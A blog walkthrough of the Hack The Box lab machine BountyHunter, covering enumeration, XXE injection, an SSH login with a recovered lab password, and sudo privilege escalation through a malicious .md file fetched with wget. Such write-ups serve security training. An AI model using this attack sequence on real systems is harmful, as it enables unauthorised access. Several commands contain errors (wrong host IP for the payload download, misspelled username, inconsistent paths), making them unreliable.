Bounty hunter hack the box walkthrough

BOUNTY HUNTER HACK THE BOX WALKTHROUGH

 Welcome to tamilcode

HERE IS TRICKS AND TECHNOLOGY

so in this website, we going to see the walkthrough or writeup for bounty hunter hack the box machine and we going to take over the user flag and root flag of the machine... 

so first turn and on your hack the box VPN and load the IP address on your browser which is 10.10.11.100

ENUMERATION :

writer hack the box machine

https://tamilcodeoffical.blogspot.com/2021/08/writer-hack-box-walkthrough.html

First, we going to take the Nmap scan using the below command 

STEP 1: nmap -sC -sV 10.10.11.100

the result is shown below:

so in this result, we are able to see the interesting services is SSH and port is 22 

Next, we going to brute force the directory using gobuster for any interesting directory

STEP 2: gobuster dir -u http://10.10.11.100/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 

result for gobuster 

so in this gobuster result, we will abe to see the lots of hidden directories...

Next, go to the webpage and click the portal tab in this section you will be able to see the development under construction, and there is a click the here button.

JOIN IN THE MEMBERSHIP

https://tamilcodeoffical.blogspot.com/p/tamilcode-membership-program.html

Click the button it will

further, I have tried more SQL injection but nothing done

SCANNING :

further, I have scanned the webpage using burpsuit (shown in the below image )

And the request to the burpsuit repeater... 

In this request, the data is encoded in the url+base64 encoding.

so going to decode the encoding using the cyber chief website (link is below)

we going to decode using this website (instructions are shown below image)

now it has been decoded

And it looks like an XML file and have found that it has XXE vulnerability using the below website...

so in this website, you will be able to study XXE or XML vulnerability...

Now we going to inject the XXE payload in the XML file and encode the file and send it to the web application... 

you can download the payload using the below link 

Now can able to download the payload and inject in the XML file (image is shown below)

Next, encode a file using cyber chief the encode should be base64+urlencoding (shown below image)

so copy the encode and paste burpsuit data request  (show below image) 

Now send the request you get a response... in this response, you are able to see some encode (shown below image)

In this encoding you will be able to see the password... but I have tried this username and password it will not work and I have a password for another user it will work by using another payload...

You can able to download the payload using the below link 

Copy the payload and paste it into the XML file and encode the XML file by seeing the below image...

Next copy the encode and paste in the request and you get the response...

So in this response, you will be able to see some encoding (shown below image)

Next, decode this encoding by seeing the below image 

In this decoding, you will be able to see the user which is development...

Now we got the username: development

Password : m19RoAU0hP41A1sTsq6K

Now we find the username and password and we going to enter through the SSH using the below command 

STEP 3: ssh devlopment@10.10.11.100

now it will ask for the password... so enter password  m19RoAU0hP41A1sTsq6K

BOOOOOOOOOOOOOOOOOOMMMMMMMM!!!!!

now you will get the shell.....

STEP 4: ls 

hurrrrrrrrrrrrrrrrrrrrrh!!!!

now you get the user flag which is the user.txt 

STEP 5: cat user.txt

now you get a user flag so next, we going to take over the root flag...

PRIVILEGE ESCALATION:

STEP 6: sudo -l

Now we get something which is shown below image 

Next, we go the exploit this ticket validator...

If you want to exploit this first we want to view the program using the below command 

STEP 7: cat opt/skytrain_inc/ticket validator.py

In this code, you will be able to see that what this program was doing... the program allows only the .md file... if you have any file with another extension it will not work... 

So we going to write malicious code in the extension of .md EX tamil.md

you can download the payload or script  using the below link

after download, the payload  change the python file to .md file and enter to the tmp folder using below 

now go to the back directory using the command of cd ..

STEP 8:  cd tmp

Transfer the payload using the below command 

so first start the python server in you local machine using the below command 

STEP  9: python3 -m http.server 6060

STEP 10: wget  http://10.10.11.100:6060/tamil.md 

Now the payload will be transferred to the folder...

so next enter the below command 

STEP 11: chmod 777 tamil.md

STEP 12: sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py

Now it will ask to enter the path of the file...

so next enter the path file 

STEP 13:  /tmp/tamil.md

boooooooooooooommmmm !!!!! 

now you get the root shell 

STEP 14: cd ..

STEP 15: cd root

STEP 16: cat root.txt

now you will get the root flag which is root.txt

I hope you will understand this article please subscribe my website and please support us by donating using the below link